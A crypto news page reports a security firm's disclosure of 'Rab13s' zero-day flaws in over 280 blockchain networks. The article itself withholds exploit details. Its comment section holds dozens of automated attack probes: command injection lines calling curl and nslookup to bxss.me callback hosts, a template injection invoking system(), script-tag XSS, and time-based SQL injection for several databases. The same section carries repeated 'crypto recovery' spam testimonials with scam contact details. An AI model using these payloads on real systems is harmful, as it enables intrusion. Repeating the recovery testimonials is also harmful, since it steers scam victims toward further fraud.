Русский
EnglishCryptocurrencies:
9549 /
Markets: 112989
Market Cap: $ 3 756 989 468 481 /
24h Vol: $ 523 064 392 273 /
BTC
Dominance: 59.613031454844%
News
More than 280 blockchains at risk of ‘zero-day’ exploits, warns security firm
Dogecoin, Zcash and Litecoin have already patched the “critical” vulnerability, but hundreds of others may not have, risking billions' worth of crypto.
280 or more blockchain networks are estimated to be at risk of “zero-day” exploits that could put at least $25 billion worth of crypto at risk, according to cybersecurity firm Halborn.
In a Mar. 13 blog, Halborn warned of the vulnerability it dubbed “Rab13s” — adding it has already worked with some blockchains, such as Dogecoin, Litecoin and Zcash, to institute a fix for it.
Halborn discovered massive #ZeroDay impacting Dogecoin and 280+ networks including Litecoin and Zcash, putting over $25 Billion of digital assets at risk!
— Halborn (@HalbornSecurity) March 13, 2023
...
Halborn was contracted by Dogecoin in March 2022 to conduct a security review of its codebase and found “several critical and exploitable vulnerabilities.”
It later determined those same vulnerabilities “affected over 280 other networks” that risked billions of dollars worth of cryptocurrencies.
Halborn outlined three vulnerabilities, the “most critical” of which allows an attacker to “send crafted malicious consensus messages to individual nodes, causing each to shut down.”
3/ The most critical vulnerability discovered is related to peer-to-peer (p2p) communications where attackers can craft consensus messages and send it to individual nodes, taking them offline.
— Halborn (@HalbornSecurity) March 13, 2023
Halborn researchers, led by @safe_buffer, have code-named this vulnerability #Rab13s.
It added these messages over time could expose the blockchain to a 51% attack where an attacker controls the majority of the network’s mining hash rate or staked tokens to make a new version of the blockchain or take it offline.
Other zero-day vulnerabilities it found would allow potential attackers to crash blockchain nodes by sending Remote Procedure Call (RPC) requests — a protocol allowing a program to communicate and request services from another.
7/ Secondly, attackers can execute code through the public interface (RPC) as a normal node user. Since a valid credential is required to carry out the attack, the likelihood of this exploit is lower.
— Halborn (@HalbornSecurity) March 13, 2023
It added the likelihood of RPC-related exploits was lower as it requires valid credentials to undertake the attack.
“Due to codebase differences between the networks not all the vulnerabilities are exploitable on all the networks, but at least one of them may be exploitable on each network,” Halborn warned.
Related: Jump Crypto and Oasis.app ‘counter exploits’ Wormhole hacker for $225M
The firm said at this time it’s not releasing further technical details of the exploits due to their severity and added it made a “good faith effort” to contact all affected parties to disclose the potential exploits and provide remediation for the vulnerabilities.
Dogecoin, Zcash and Litecoin have already implemented patches for the discovered vulnerabilities, but hundreds could still be exposed according to Halborn.
-
09.10.25 08:08
pHqghUme
can I ask you a question please?|echo qswrbu$()\ ovnycc\nz^xyu||a #' |echo qswrbu$()\ ovnycc\nz^xyu||a #|" |echo qswrbu$()\ ovnycc\nz^xyu||a #
-
09.10.25 08:08
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:08
pHqghUme
expr 9000227416 - 917575
-
09.10.25 08:08
pHqghUme
(nslookup -q=cname hitrirljyvgim44c57.bxss.me||curl hitrirljyvgim44c57.bxss.me))
-
09.10.25 08:08
pHqghUme
$(nslookup -q=cname hitnaasjhmbqf44699.bxss.me||curl hitnaasjhmbqf44699.bxss.me)
-
09.10.25 08:08
pHqghUme
&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&'\"`0&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&`'
-
09.10.25 08:08
pHqghUme
&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'
-
09.10.25 08:08
pHqghUme
|(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)
-
09.10.25 08:08
pHqghUme
`(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`
-
09.10.25 08:08
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:08
pHqghUme
;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)
-
09.10.25 08:08
pHqghUme
|(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)
-
09.10.25 08:09
pHqghUme
&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'
-
09.10.25 08:09
pHqghUme
can I ask you a question please?
-
09.10.25 08:09
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:09
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:09
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
e
-
09.10.25 08:11
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
can I ask you a question please?
-
09.10.25 08:12
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:13
pHqghUme
can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
-
09.10.25 08:13
pHqghUme
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
-
09.10.25 08:13
pHqghUme
'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
-
09.10.25 08:13
pHqghUme
can I ask you a question please?9425407
-
09.10.25 08:13
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:14
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:16
pHqghUme
e
-
09.10.25 08:17
pHqghUme
e
-
09.10.25 08:17
pHqghUme
e
-
09.10.25 08:17
pHqghUme
"+response.write(9043995*9352716)+"
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:17
pHqghUme
can I ask you a question please?
-
09.10.25 08:18
pHqghUme
can I ask you a question please?
-
09.10.25 08:18
pHqghUme
$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:18
pHqghUme
|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
-
09.10.25 08:18
pHqghUme
|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
-
09.10.25 08:18
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:19
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:20
pHqghUme
e
-
09.10.25 08:20
pHqghUme
e
-
09.10.25 08:21
pHqghUme
e
-
09.10.25 08:21
pHqghUme
e
-
09.10.25 08:21
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
can I ask you a question please?
-
09.10.25 08:22
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:22
pHqghUme
if(now()=sysdate(),sleep(15),0)
-
09.10.25 08:22
pHqghUme
can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
09.10.25 08:23
pHqghUme
can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
09.10.25 08:23
pHqghUme
can I ask you a question please?
-
09.10.25 08:23
pHqghUme
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
09.10.25 08:24
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:24
pHqghUme
e
-
09.10.25 08:24
pHqghUme
can I ask you a question please?-1 waitfor delay '0:0:15' --
-
09.10.25 08:25
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
e
-
09.10.25 08:25
pHqghUme
can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
-
09.10.25 08:26
pHqghUme
can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
-
09.10.25 08:26
pHqghUme
e
-
09.10.25 08:27
pHqghUme
can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
-
09.10.25 08:27
pHqghUme
can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
-
09.10.25 08:28
pHqghUme
can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
09.10.25 08:28
pHqghUme
can I ask you a question please?
-
09.10.25 08:28
pHqghUme
can I ask you a question please?'"
-
09.10.25 08:28
pHqghUme
@@olQP6
-
09.10.25 08:28
pHqghUme
(select 198766*667891)
-
09.10.25 08:28
pHqghUme
(select 198766*667891 from DUAL)
-
09.10.25 08:30
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:33
pHqghUme
can I ask you a question please?
-
09.10.25 08:34
pHqghUme
can I ask you a question please?
-
09.10.25 08:34
pHqghUme
if(now()=sysdate(),sleep(15),0)
-
09.10.25 08:35
pHqghUme
e
-
09.10.25 08:36
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:36
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:37
pHqghUme
e
-
09.10.25 08:37
pHqghUme
e
-
09.10.25 08:40
pHqghUme
can I ask you a question please?
-
09.10.25 08:40
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:41
pHqghUme
e
-
09.10.25 08:41
pHqghUme
can I ask you a question please?
-
09.10.25 08:42
pHqghUme
can I ask you a question please?
-
09.10.25 08:42
pHqghUme
is it ok if I upload an image?
-
09.10.25 08:42
pHqghUme
e
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
09.10.25 11:05
marcushenderson624
Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
-
04:41
luciajessy3
Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
-
10:44
Tonerdomark
A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
To join the Chat, you need a free pro-blockchain.com account.
Enter
Registration